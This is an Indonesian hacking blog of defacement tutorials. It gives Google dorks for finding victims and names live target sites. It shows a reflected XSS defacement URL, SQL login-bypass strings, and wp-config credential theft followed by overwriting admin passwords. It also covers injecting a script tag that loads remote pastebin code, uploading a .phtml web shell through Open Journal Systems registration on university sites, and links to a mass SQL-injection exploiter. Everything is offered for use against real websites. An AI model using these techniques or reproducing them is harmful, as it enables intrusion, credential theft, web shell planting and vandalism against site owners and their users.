Senin, 14 November 2016

Tutorial Deface - XSS Vulnerability

Hello Brother and Sister~ Sudah lama UnknownSec tidak posting tentang deface (padahal sih baru 2 hari :D ). Sekarang saya akan membahasa tentang Tutorial Deface Menggunakan Teknik XSS Vulnerability.

Sebelumnya sudah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client., Langsung saja kita bahas bersama Tutorial Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

*Gunakan dork sql injection


2). Kalau sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13


3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by UnknownSec</h1></marquee>

4). Kemudian tekan Enter.


5). Selesai, Website sudah berhasil kita deface :D

Tekniknya cukup simpel, kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Semoga Bermanfaat ^-^

Source: 

Hacker Newbie

http://indocyberarmy.blogspot.com/2013/02/cara-deface-website-menggunakan-teknik.html

Jumat, 11 November 2016

Tutorial Deface - Jumping

Hello Brother and sister ~ Kali ini UnknownSec akan membahas Tutorial Deface dengan Metode Jumping
LANGSUNG SAJA!! 
Bahan:
-Shell yang sudah ada fitur Jumping-nya
Upload My Sql form Login ke web Target melalui Shell
Masuk Shell, klik "Jumping".
Bebas mau pilih yang mana
Nah kita bisa lihat apa cms yang dia pakai, 
-Cms Joomla cari "configuration.php
-Wordpress cari "wp-config.php". 
Berhubung site target jumping ane make Cms Wordpress jadi ane cari "wp-config.php"
Bisa kalian lihat, db_name, db_user, db_password, db_host. kalau sudah, buka My Sql form login yang tadi di upload
Masukan data data yang di dapatkan tadi, contohnya lihat gambar aja. kalau sudah, klik "Connect"
Cari file sesuai cms 
-Wordpress = "wp_users". 
-Joomla "jos_user".
Nah akhirnya ketemu user pass admin dan lainnya. Selanjutnya klik "Edit" Contohnya di gambar.
Nahh di kolom "user_pass" itu di ganti sama password ente Password Md5 yoo kalo belom ada Create disini kalo udah klik Save / Edit , lihatt gambar.
Masuk ke admin loginnya sesuai cms, 
-Wordpress = http://site.com/wp-login.php 
-Joomla = http://site.com/administrator/

Berhubung target yang ane dapatkan itu adalah cms. Berarti saya masuk ke http://site.com/wp-login.php
*Tidak Semua admin page sama seperti yang disebutkan diatas, tidak sedikit yang mengubah admin pagenya.  Jika tidak ketemu admin pagenya, kalian harus menggunakan Metode AdminPage Finder untuk menemukan admin pagenya
Masukin User:Pass nya,
Dan akhirnya masuk ke Dashboard Admin nya :D
Tinggal Nanem shell deh ^_^
Sumber:
http://b4rc0d3.blogspot.com/2015/05/deface-dengan-teknik-jumping.html

Tutorial Deface - Bypass SQL Login

Hello Brother and Sister~ kali ini UnknownSec akan membahas mengenai "Bypass SQL Login"

Maksudnya gimana?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih
"bypass = bye bye password"

Tutorial:.

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/


[#] Langkah-langkah

1. Cari target melalui Dork diatas diGoogle.

Live target:

http://preprojects.com/hostfriendz/int/index.php


2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :

user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Mudah bukan? ^_^

thanks to Mr Xenophobic ^_^


Sumber:

http://indocyberarmy.blogspot.co.id/2014/01/tutorial-bypass-sql-login.html

Tutorial Deface - JS Overlay

Hello Brother and Sister~ Kali ini UnknownSec akan berbagi teknik deface yang jarang digunakan mungkin karena ini menjadi alternatif terakhir ketika kita gagal memasang backdoor pada web target. Ada kalanya sebuah website tidak support file php [tapi ini masih bisa ditamper],  atau web tersebut tidak menyediakan fasilitad upload.  Cara yang tepat saat terjadi kejadian seperti diatas adalah menutup halaman depan dengan sebuah 'evil' Javascript. 


Cara kerjanya berbeda dengan teknik deface yang biasanya dengan mengupload shell terlebih dahulu sebelum tebas indexnya. Jika shell terupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. 

Caranya ?
 Bahan:
- Script deface yang sudah ditertanam di web lain afau kalian bisa upload di hosting kalian 
*ini hanya "umpan" agar tampilan deface kita tampil di website target

-Evil Script yang tertatam di web lain juga. Bisa juga upload di pastebin
Silahkan modifikasi sendiri bagian "Hacked by" dan source deface nya. Disini saya menggunakan script yang sudah termirror di zone-h.org .
(edit bagian : http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php)

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :

- Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.
Masukkan script ini di bagian judul :
<script type="text/javascript" src="http://pastebin.com/raw/Za6HM0qL"></script>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.

Setelah di save, kita coba buka situs yang telah di tanam script js overlay tadi.

©LinuxSec

Taaraaaaa!!.... 

Teknik ini bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.

Kekurangannya, kita tidak punya akses ke server karena tidak ada backdoor yang tertanam.

Thanks to BagsFreakz from Surabaya Blackhat.

Sumber:
http://exploit.linuxsec.org/2013/04/tutorial-deface-dengan-js-overlay.html

Tutorial Deface - Open Journal Systems (OJS)

Hello Brother and Sister~ kali ini Unknownsec akan berbagi tutorial deface yang Sedang Trend yaitu Open Journal Systems (OJS) dengan target kebanyakan website Universitas di Indonesia.
===========
Dorknya : inurl:/index.php/index/user/register
/index.php/index/user/register/ Open Journal Systems
/index.php/index/user/register
/index/user/register/
/user/register
/index of files OJS intitle:register
"/index of files" "OJS"
"/index of files" "journal article"
/ojs/index.php/user/register/
/journal/index.php/user/register/
"/journal" intext:register inurl:user/register 
/OpenJournal register "parent directory 
/OpenJournal register "Index Of" 
/files/journals/1/articles "articles" 
/files/journals/1/articles "submission" 
/files/journals/1/articles "register" 
/submission/original/ "OJS"
/submission/original/ "OpenJournal"
"parent directory" /files/journals/1/submission
inurl:/user/register/ "e-journal"
/files/journals/1/articles/
=================
Bahan:
-Shell berukuran Kecil yang ekstensinya diubah menjadi .phtml,
Contoh: UnkSec.phtml
Live Target:
http://jurnal.u**j.ac.id/index.php/index/user/register
Pertama pilih journal untuk register, saya akan pilih yang
paling atas.
Kemudian isi form yang hanya diberi tanda * untuk
mempercepat. Lalu dibagian bawah jadikan centang seperti
berikut.
*Jangan Centang Email Konfirmasi
Kemudian klik register.
Dibagian ini klik New Submission yang ada disebelah kanan.
Centang semua seperti gambar kemudian klik save and continue.
Kemudian upload shell kalian yang berekstensi .phtml
Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user kamu

Shell Path : 
http://www.site.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml
Contoh : /files/journals/1/articles/4/submission/original/4-4-1-SM.phtml
Sumber:
https://ghostbin.com/paste/xvpkt

Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit

Hello Brother and Sister~ UnknownSec akan Share tools untuk para exploiter SQLi Lokomedia. Tools ini dibuat dan dipermudah oleh IndoXploit. Jadi kalian tinggal mengikuti petunjuknya saja. 

Ini Penampilan tools dari berbagai versi:

[ CLI ]


[ Web Based ]




Petunjuk: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

Contoh:
http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/

- buka cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut (site.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/


Download Links:
[ CLI ] ->http://pastebin.com/sPpJRjCZ
[ Web Based ] ->http://pastebin.com/0STXanAx

Silahkan Mencoba ^^

UnknownSec! 


nb:

*Artikel ini diambil dari IndoXploit

** Penggunaan bahasa diubah sedikit agar lebih baku ^_^


Sumber:

http://www.indoxploit.or.id/2016/09/lokomedia-sql-injection-auto-scan-admin.html?m=1